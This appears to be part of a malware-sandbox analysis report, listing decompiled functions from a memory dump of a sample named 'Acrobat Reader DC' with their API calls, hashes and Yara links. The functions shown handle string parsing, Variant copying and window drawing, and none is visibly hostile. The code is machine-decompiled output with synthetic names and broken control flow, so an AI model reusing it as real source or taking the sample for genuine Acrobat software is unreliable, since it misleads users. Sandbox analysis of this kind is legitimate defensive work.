                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00444BFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a15) {
				char _v12;
				void* __edi;
				signed int _t47;
				signed int _t49;
				signed int _t50;
				signed int _t62;
				signed int _t64;
				signed int _t69;
				signed int _t76;
				signed int _t77;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t85;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr _t94;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;

				_t94 = _a8;
				_t93 = _a12;
				_t47 = 0;
				while(1) {
					_t80 =  *(_t94 + _t47 * 2) & 0x0000ffff;
					if(_t80 != 0x20 && _t80 != 9) {
						break;
					}
					_t47 = _t47 + 1;
				}
				_t81 =  *(_t94 + _t47 * 2) & 0x0000ffff;
				__eflags = _t81 - 0x22;
				if(_t81 != 0x22) {
					__eflags = _t81 - 0x27;
					if(_t81 != 0x27) {
						__eflags = _t81 - 0x3c;
						if(_t81 != 0x3c) {
							goto L29;
						} else {
							_t9 = _t81 + 2; // 0x2
							_t88 = _t9;
							_a15 = 0;
							goto L10;
						}
					} else {
						_t88 = _t81;
						_a15 = 1;
						goto L10;
					}
				} else {
					_t88 = _t81;
					_a15 = 1;
					L10:
					_t82 =  *(_t94 + 2 + _t47 * 2) & 0x0000ffff;
					_t49 = _t47 + 1;
					_t76 = 0;
					__eflags = _t82 - _t88;
					if(_t82 != _t88) {
						while(1) {
							__eflags = _t82;
							if(_t82 == 0) {
								goto L13;
							}
							_t49 = _t49 + 1;
							 *(_t93 + _t76 * 2) = _t82;
							_t82 =  *(_t94 + _t49 * 2) & 0x0000ffff;
							_t76 = _t76 + 1;
							__eflags = _t82 - _t88;
							if(_t82 != _t88) {
								continue;
							}
							goto L13;
						}
					}
					L13:
					__eflags =  *(_t94 + _t49 * 2) - _t88;
					if( *(_t94 + _t49 * 2) != _t88) {
						L29:
						__eflags = 0;
						return 0;
					} else {
						goto L14;
						do {
							do {
								L14:
								_t83 =  *(_t94 + 2 + _t49 * 2) & 0x0000ffff;
								_t49 = _t49 + 1;
								__eflags = _t83 - 0x20;
							} while (_t83 == 0x20);
							__eflags = _t83 - 9;
						} while (_t83 == 9);
						_t50 =  *(_t94 + _t49 * 2) & 0x0000ffff;
						__eflags = _t50;
						if(__eflags == 0) {
							L18:
							 *(_t93 + _t76 * 2) = 0;
							E0043652F(__eflags,  &_v12, E00410160(_t93, __eflags));
							_t95 = _v12;
							E00444B5F( &_v12, _v12);
							E00444BBB( &_v12, __eflags, _v12);
							__eflags = _a15;
							if(_a15 == 0) {
								_t85 = _a4;
								_t77 = 0;
								__eflags =  *(_t85 + 0x3c);
								if( *(_t85 + 0x3c) > 0) {
									while(1) {
										E00411567(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x38)) + _t77 * 4)));
										E00411536(_t93, _t95);
										_t62 = E004339FA(_t93);
										_t97 = _t96 + 0x14;
										__eflags = _t62;
										if(_t62 != 0) {
											goto L28;
										}
										E00411567(_t93, _t95);
										_t90 = _a4;
										_t77 = _t77 + 1;
										_t96 = _t97 + 8;
										__eflags = _t77 -  *((intOrPtr*)(_t90 + 0x3c));
										if(_t77 <  *((intOrPtr*)(_t90 + 0x3c))) {
											continue;
										}
										goto L28;
									}
								}
								goto L28;
							} else {
								_t64 = E004339FA(_t93);
								_t98 = _t96 + 4;
								__eflags = _t64;
								if(_t64 == 0) {
									_t79 =  *((intOrPtr*)(_a4 + 0x3c)) - 1;
									__eflags = _t79;
									if(_t79 < 0) {
										L28:
										E00436508( &_v12);
										return 1;
									} else {
										while(1) {
											E00411567(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x38)) + _t79 * 4)));
											E00411536(_t93, _t95);
											_t69 = E004339FA(_t93);
											_t99 = _t98 + 0x14;
											__eflags = _t69;
											if(_t69 != 0) {
												goto L28;
											}
											E00411567(_t93, _t95);
											_t98 = _t99 + 8;
											_t79 = _t79 - 1;
											__eflags = _t79;
											if(_t79 >= 0) {
												continue;
											} else {
												E00436508( &_v12);
												return 1;
											}
											goto L30;
										}
										goto L28;
									}
								} else {
									E00436508( &_v12);
									return 1;
								}
							}
						} else {
							__eflags = _t50 - 0x3b;
							if(__eflags != 0) {
								goto L29;
							} else {
								goto L18;
							}
						}
					}
				}
				L30:
			}



























                                  0x00444c04
                                  0x00444c08
                                  0x00444c0b
                                  0x00444c0d
                                  0x00444c0d
                                  0x00444c14
                                  0x00000000
                                  0x00000000
                                  0x00444c1b
                                  0x00444c1b
                                  0x00444c1e
                                  0x00444c22
                                  0x00444c25
                                  0x00444c2f
                                  0x00444c32
                                  0x00444c3c
                                  0x00444c3f
                                  0x00000000
                                  0x00444c45
                                  0x00444c45
                                  0x00444c45
                                  0x00444c48
                                  0x00000000
                                  0x00444c48
                                  0x00444c34
                                  0x00444c34
                                  0x00444c36
                                  0x00000000
                                  0x00444c36
                                  0x00444c27
                                  0x00444c27
                                  0x00444c29
                                  0x00444c4c
                                  0x00444c4c
                                  0x00444c51
                                  0x00444c52
                                  0x00444c54
                                  0x00444c57
                                  0x00444c59
                                  0x00444c59
                                  0x00444c5c
                                  0x00000000
                                  0x00000000
                                  0x00444c5e
                                  0x00444c5f
                                  0x00444c63
                                  0x00444c67
                                  0x00444c68
                                  0x00444c6b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444c6b
                                  0x00444c59
                                  0x00444c6d
                                  0x00444c6d
                                  0x00444c71
                                  0x00444d8d
                                  0x00444d8d
                                  0x00444d93
                                  0x00444c77
                                  0x00000000
                                  0x00444c77
                                  0x00444c77
                                  0x00444c77
                                  0x00444c77
                                  0x00444c7c
                                  0x00444c7d
                                  0x00444c7d
                                  0x00444c82
                                  0x00444c82
                                  0x00444c87
                                  0x00444c8b
                                  0x00444c8e
                                  0x00444c99
                                  0x00444c9b
                                  0x00444ca9
                                  0x00444cae
                                  0x00444cb2
                                  0x00444cb8
                                  0x00444cbd
                                  0x00444cc1
                                  0x00444d36
                                  0x00444d39
                                  0x00444d3b
                                  0x00444d3e
                                  0x00444d40
                                  0x00444d4b
                                  0x00444d52
                                  0x00444d58
                                  0x00444d5d
                                  0x00444d60
                                  0x00444d62
                                  0x00000000
                                  0x00000000
                                  0x00444d66
                                  0x00444d6b
                                  0x00444d6e
                                  0x00444d6f
                                  0x00444d72
                                  0x00444d75
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444d75
                                  0x00444d40
                                  0x00000000
                                  0x00444cc3
                                  0x00444cc4
                                  0x00444cc9
                                  0x00444ccc
                                  0x00444cce
                                  0x00444cea
                                  0x00444cea
                                  0x00444ceb
                                  0x00444d77
                                  0x00444d7b
                                  0x00444d88
                                  0x00444cf1
                                  0x00444cf1
                                  0x00444cfc
                                  0x00444d03
                                  0x00444d09
                                  0x00444d0e
                                  0x00444d11
                                  0x00444d13
                                  0x00000000
                                  0x00000000
                                  0x00444d17
                                  0x00444d1c
                                  0x00444d1f
                                  0x00444d1f
                                  0x00444d20
                                  0x00000000
                                  0x00444d22
                                  0x00444d26
                                  0x00444d33
                                  0x00444d33
                                  0x00000000
                                  0x00444d20
                                  0x00000000
                                  0x00444cf1
                                  0x00444cd0
                                  0x00444cd4
                                  0x00444ce1
                                  0x00444ce1
                                  0x00444cce
                                  0x00444c90
                                  0x00444c90
                                  0x00444c93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444c93
                                  0x00444c8e
                                  0x00444c71
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscpy$_wcscat
                                  • String ID:
                                  • API String ID: 2037614760-0
                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E00451B42(intOrPtr* _a4, signed short* _a8, signed short* _a12, char _a16, char _a20) {
				signed short _v16;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v40;
				char _v56;
				char _v72;
				void* __edi;
				void* __esi;
				intOrPtr _t61;
				long _t65;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t86;
				signed short* _t87;
				intOrPtr* _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				signed int _t104;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr* _t115;
				signed short* _t116;
				signed int _t120;

				_t87 = _a8;
				_t116 = _a12;
				_v40 = 0;
				_v32 = 1;
				_v28 = 0;
				_a12 = _t87;
				if( *0x4a7f19 == 0) {
					L14:
					E00403C90( *((intOrPtr*)( *_a4 + 4)) + _a4, _t87, 0);
					__eflags = _a20;
					if(_a20 == 0) {
						goto L13;
					} else {
						E00408F40(_t115,  &_v40);
						return 1;
					}
				} else {
					_t61 =  *0x4a7f1c; // 0x0
					if(_t61 == 0) {
						goto L14;
					} else {
						if( *((char*)(_t61 + 0x40)) == 0) {
							 *((short*)(_t61 + 0x48)) = 3;
							 *((intOrPtr*)(_t61 + 0x50)) = _t87;
							 *((short*)(_t61 + 0xa8)) = 3;
							_t65 = GetLastError();
							_t107 =  *0x4a7f1c; // 0x0
							 *(_t107 + 0xb0) = _t65;
							 *((short*)(_t107 + 0xb8)) = 3;
							 *((intOrPtr*)(_t107 + 0xc0)) = E004348AA( *((intOrPtr*)(_a4 + 0xf4)));
							if(_t116 != 0) {
								_t115 = __imp__#10;
								_v24 = 8;
								_v16 = _t116[2];
								 *_t115(_t107 + 0x78,  &_v24);
								_t99 =  *0x4a7f1c; // 0x0
								_v16 = _t116[4];
								 *_t115(_t99 + 0x68,  &_v24);
								_t101 =  *0x4a7f1c; // 0x0
								_v16 = _t116[6];
								 *_t115(_t101 + 0x88,  &_v24);
								_t86 =  *0x4a7f1c; // 0x0
								 *((short*)(_t86 + 0x98)) = 3;
								 *(_t86 + 0xa0) = _t116[8];
								 *((short*)(_t86 + 0xc8)) = 3;
								_t104 =  *_t116 & 0x0000ffff;
								if(_t104 == 0) {
									_t120 = _t116[0xe];
								} else {
									_t120 = _t104;
								}
								 *(_t86 + 0xd0) = _t120;
								_t126 = _t120;
								if(_t120 != 0) {
									_a12 = _t120;
								}
							}
							E0040BC70( &_v56, _t126);
							if(_a16 == 0) {
								E0040E0A0( &_v56, E0044AF6C( &_v72, _a12));
								E00402250( &_v72);
								_a16 = _v56;
							}
							_t70 =  *0x4a7f1c; // 0x0
							__imp__#9(_t70 + 0x58);
							_t72 = _a16;
							_t108 =  *0x4a7f1c; // 0x0
							 *((short*)(_t108 + 0x58)) = 8;
							__imp__#2(_t72);
							_t93 =  *0x4a7f1c; // 0x0
							 *((intOrPtr*)(_t93 + 0x60)) = _t72;
							 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 0x20))))();
							E00402250( &_v56);
						}
						E00403C90( *((intOrPtr*)( *_a4 + 4)) + _a4, _t87, 0);
						L13:
						E00408F40(_t115,  &_v40);
						return 0;
					}
				}
			}



























                                  0x00451b50
                                  0x00451b54
                                  0x00451b58
                                  0x00451b5f
                                  0x00451b66
                                  0x00451b6d
                                  0x00451b70
                                  0x00451cfd
                                  0x00451d0a
                                  0x00451d0f
                                  0x00451d13
                                  0x00000000
                                  0x00451d15
                                  0x00451d18
                                  0x00451d28
                                  0x00451d28
                                  0x00451b76
                                  0x00451b76
                                  0x00451b7d
                                  0x00000000
                                  0x00451b83
                                  0x00451b87
                                  0x00451b92
                                  0x00451b96
                                  0x00451b99
                                  0x00451ba0
                                  0x00451ba6
                                  0x00451baf
                                  0x00451bba
                                  0x00451bcd
                                  0x00451bd5
                                  0x00451bde
                                  0x00451be9
                                  0x00451bf5
                                  0x00451bf8
                                  0x00451bfa
                                  0x00451c0b
                                  0x00451c0e
                                  0x00451c10
                                  0x00451c24
                                  0x00451c27
                                  0x00451c29
                                  0x00451c33
                                  0x00451c3d
                                  0x00451c43
                                  0x00451c4a
                                  0x00451c50
                                  0x00451c56
                                  0x00451c52
                                  0x00451c52
                                  0x00451c52
                                  0x00451c59
                                  0x00451c5f
                                  0x00451c61
                                  0x00451c63
                                  0x00451c63
                                  0x00451c61
                                  0x00451c69
                                  0x00451c72
                                  0x00451c85
                                  0x00451c8d
                                  0x00451c95
                                  0x00451c95
                                  0x00451c98
                                  0x00451ca1
                                  0x00451ca7
                                  0x00451caa
                                  0x00451cb6
                                  0x00451cba
                                  0x00451cc0
                                  0x00451cc8
                                  0x00451cce
                                  0x00451cd3
                                  0x00451cd3
                                  0x00451ce5
                                  0x00451cea
                                  0x00451ced
                                  0x00451cfa
                                  0x00451cfa
                                  0x00451b7d

                                  APIs
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                  • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                  • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                  • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                  • String ID:
                                  • API String ID: 960795272-0
                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E00447BA8(void* __fp0, intOrPtr _a4) {
				struct tagPAINTSTRUCT _v68;
				struct tagRECT _v84;
				struct tagPOINT _v92;
				struct HWND__** _v104;
				void* _v129;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t38;
				struct HWND__** _t45;
				struct HWND__* _t46;
				void* _t51;
				struct HWND__** _t55;
				struct HWND__* _t57;
				intOrPtr _t59;
				struct HDC__* _t73;
				struct HWND__* _t76;
				signed int _t78;
				void* _t80;
				void* _t91;

				_t91 = __fp0;
				_t80 = (_t78 & 0xfffffff8) - 0x5c;
				_t32 = E00430C09(_a4, 0x4a8630, _a4);
				_t59 =  *0x4a8690; // 0x0
				_t55 =  *( *(_t59 + _t32 * 4));
				_t76 = _t55[0x73];
				_v104 = _t55;
				_t73 = BeginPaint( *_t55,  &(_v84.right));
				while(_t76 != 0) {
					_t37 =  *(_t76 + 8);
					if(( *(_t37 + 0x8a) & 0x00000010) == 0 ||  *(_t37 + 0x8b) != 0xff) {
						if(( *(_t37 + 0x8b) & 0x000000ff) == _t55[0x65]) {
							goto L5;
						}
					} else {
						L5:
						_t38 = _t37 | 0xffffffff;
						 *0x4a86f4 = _t38;
						 *0x4a86f8 = _t38;
						 *0x4a86ec = 0;
						 *0x4a86e8 = 0;
						 *0x4a86e4 = 0;
						 *0x4a86f0 = 1;
						GetWindowRect( *( *(_t76 + 8)),  &_v84);
						_v92.x = _v84.left;
						_v92.y = _v84.top;
						ScreenToClient( *_t55,  &_v92);
						SetViewportOrgEx(_t73, _v92, _v92.y, 0);
						_t45 =  *(_t76 + 8);
						_t57 = _t45[0x11];
						_t46 = _t45[0x12];
						if(_t57 < 0) {
							L8:
							if(_t46 != 0xffffffff || _t57 >= 0) {
								goto L10;
							}
						} else {
							if(_t46 != 0xffffffff) {
								L10:
								E0044719B(_t73, _t46, _t57, 0, 1);
								Rectangle(_t73, 0, 0, ( *(_t76 + 8))[0x21], ( *(_t76 + 8))[0x21]);
								E0042FD29(_t73, _t57);
							} else {
								_t46 = _t57;
								goto L8;
							}
						}
						_t51 = E0044734F(_t91, _t73, _t76);
						E0044770D(_t73, _t73, _t76);
						if(_t51 != 0) {
							E004475CC(_t73, _t76, _t73, _t76);
						}
						_t55 =  *(_t80 + 0xc);
					}
					_t76 = _t76->i;
				}
				return EndPaint( *_t55,  &_v68);
			}
























                                  0x00447ba8
                                  0x00447bae
                                  0x00447bbd
                                  0x00447bc2
                                  0x00447bcb
                                  0x00447bcf
                                  0x00447bdb
                                  0x00447be5
                                  0x00447be9
                                  0x00447bf8
                                  0x00447c02
                                  0x00447c1a
                                  0x00000000
                                  0x00000000
                                  0x00447c20
                                  0x00447c20
                                  0x00447c20
                                  0x00447c23
                                  0x00447c28
                                  0x00447c2d
                                  0x00447c34
                                  0x00447c3e
                                  0x00447c48
                                  0x00447c5d
                                  0x00447c6f
                                  0x00447c77
                                  0x00447c7b
                                  0x00447c8e
                                  0x00447c94
                                  0x00447c97
                                  0x00447c9a
                                  0x00447c9f
                                  0x00447ca8
                                  0x00447cab
                                  0x00000000
                                  0x00000000
                                  0x00447ca1
                                  0x00447ca4
                                  0x00447cb1
                                  0x00447cb8
                                  0x00447cd5
                                  0x00447cdd
                                  0x00447ca6
                                  0x00447ca6
                                  0x00000000
                                  0x00447ca6
                                  0x00447ca4
                                  0x00447ce4
                                  0x00447ced
                                  0x00447cf4
                                  0x00447cf8
                                  0x00447cf8
                                  0x00447cfd
                                  0x00447cfd
                                  0x00447d01
                                  0x00447d03
                                  0x00447d1f

                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                  • GetWindowRect.USER32 ref: 00447C5D
                                  • ScreenToClient.USER32 ref: 00447C7B
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                  • EndPaint.USER32(?,?), ref: 00447D13
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                  • String ID:
                                  • API String ID: 4189319755-0
                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044900D(void* __ecx, void* __eflags, signed int _a4, long _a8) {
				signed int _v8;
				signed int _t32;
				signed char _t39;
				intOrPtr _t44;
				intOrPtr _t49;
				struct HWND__* _t53;
				struct HWND__** _t58;

				if(E00441AF5(0x4a8630, _a4,  &_a4,  &_v8) == 0) {
					L16:
					return 0;
				} else {
					_t44 =  *0x4a8690; // 0x0
					_t49 =  *0x4a86a4; // 0xa51ad0
					_a4 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _a4 * 4))));
					_t58 =  *( *(_t49 + _v8 * 4));
					_t53 =  *_t58;
					_t39 = _t58[0x22];
					E00432B92( &_a8);
					_t32 = _t39 & 0x000000ff;
					if(_t32 > 0x1b) {
						goto L16;
					} else {
						_t13 = _t32 + 0x449159; // 0x0
						switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M0044913D))) {
							case 0:
								L8:
								__eax = _a4;
								 *((intOrPtr*)(__esi + 0x48)) = _a8;
								__eax = E00430B87(_a4, __esi, 1);
								goto L9;
							case 1:
								__ecx = _a8;
								__eax = SendMessageW(__edi, 0x409, 0, _a8);
								goto L9;
							case 2:
								__eax = SendMessageW(__edi, 0x111e, 0, _a8);
								goto L9;
							case 3:
								__ecx =  *(__esi + 0x30);
								__eax = _a8;
								 *((intOrPtr*)(__esi + 0x48)) = _a8;
								__eax = InvalidateRect( *(__esi + 0x30), 0, 1);
								goto L9;
							case 4:
								_t34 = SendMessageW(_t53, 0x1024, 0, _a8);
								L9:
								if( *0x49751c == 0 || _t39 != 8 && _t39 != 4 && _t39 != 0x1a && _t39 != 0x19) {
									return 1;
								} else {
									return _t34 | 0xffffffff;
								}
								goto L17;
							case 5:
								__eax = GetWindowLongW(__edi, 0xfffffff0);
								__eax = SetWindowLongW(__edi, 0xfffffff0, __eax);
								goto L8;
							case 6:
								goto L16;
						}
					}
				}
				L17:
			}










                                  0x0044902c
                                  0x00449130
                                  0x00449138
                                  0x00449032
                                  0x00449035
                                  0x00449043
                                  0x00449049
                                  0x0044904f
                                  0x00449051
                                  0x00449053
                                  0x0044905d
                                  0x00449062
                                  0x0044906b
                                  0x00000000
                                  0x00449071
                                  0x00449071
                                  0x00449078
                                  0x00000000
                                  0x004490e7
                                  0x004490e7
                                  0x004490f1
                                  0x004490f4
                                  0x00000000
                                  0x00000000
                                  0x00449093
                                  0x0044909f
                                  0x00000000
                                  0x00000000
                                  0x004490b3
                                  0x00000000
                                  0x00000000
                                  0x004490bb
                                  0x004490be
                                  0x004490c6
                                  0x004490c9
                                  0x00000000
                                  0x00000000
                                  0x0044908b
                                  0x004490f9
                                  0x00449100
                                  0x0044912d
                                  0x00449116
                                  0x0044911f
                                  0x0044911f
                                  0x00000000
                                  0x00000000
                                  0x004490d4
                                  0x004490e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449078
                                  0x0044906b
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                  • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                  • SetWindowLongW.USER32 ref: 004490E1
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow$InvalidateRect
                                  • String ID:
                                  • API String ID: 1976402638-0
                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00440A0D(intOrPtr _a4, intOrPtr _a8, int _a12) {
				struct HWND__*** _t56;
				struct HWND__** _t57;
				struct HWND__** _t63;
				struct HWND__*** _t65;
				struct HWND__** _t66;
				struct HWND__** _t69;
				intOrPtr _t72;
				signed char _t80;
				signed int _t90;
				signed int _t91;
				intOrPtr _t92;

				_t72 = _a8;
				_t92 = _a4;
				_a8 =  *((intOrPtr*)(_t72 + 4));
				if( *(_t72 + 0x194) == _a12) {
					L14:
					_t90 = 3;
					if( *((intOrPtr*)(_t92 + 0x84)) < 3) {
						L25:
						return SendMessageW( *(_t72 + 0x18c), 0x130c, _a12, 0);
					} else {
						do {
							_t56 =  *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4);
							if( *_t56 != 0) {
								_t57 =  *_t56;
								if(_t57[1] == _a8 && _t57[0x22] != 0xb && (_t57[0x22] & 0x000000ff) ==  *(_t72 + 0x194) && (_t57[0x22] & 0x00000020) == 0) {
									ShowWindow( *_t57, 0);
									ShowWindow( *( *( *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4))), 4);
									_t63 =  *( *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4));
									if((_t63[0x22] & 0x00000040) != 0 && _t63[0x22] == 0x1a) {
										EnableWindow( *_t63, 1);
									}
								}
							}
							_t90 = _t90 + 1;
						} while (_t90 <=  *((intOrPtr*)(_t92 + 0x84)));
						goto L25;
					}
				}
				_t91 = 3;
				if( *((intOrPtr*)(_t92 + 0x84)) < 3) {
					L13:
					 *(_t72 + 0x194) = _a12;
					goto L14;
				} else {
					goto L2;
				}
				do {
					L2:
					_t65 =  *( *((intOrPtr*)(_t92 + 0x74)) + _t91 * 4);
					if( *_t65 != 0) {
						_t66 =  *_t65;
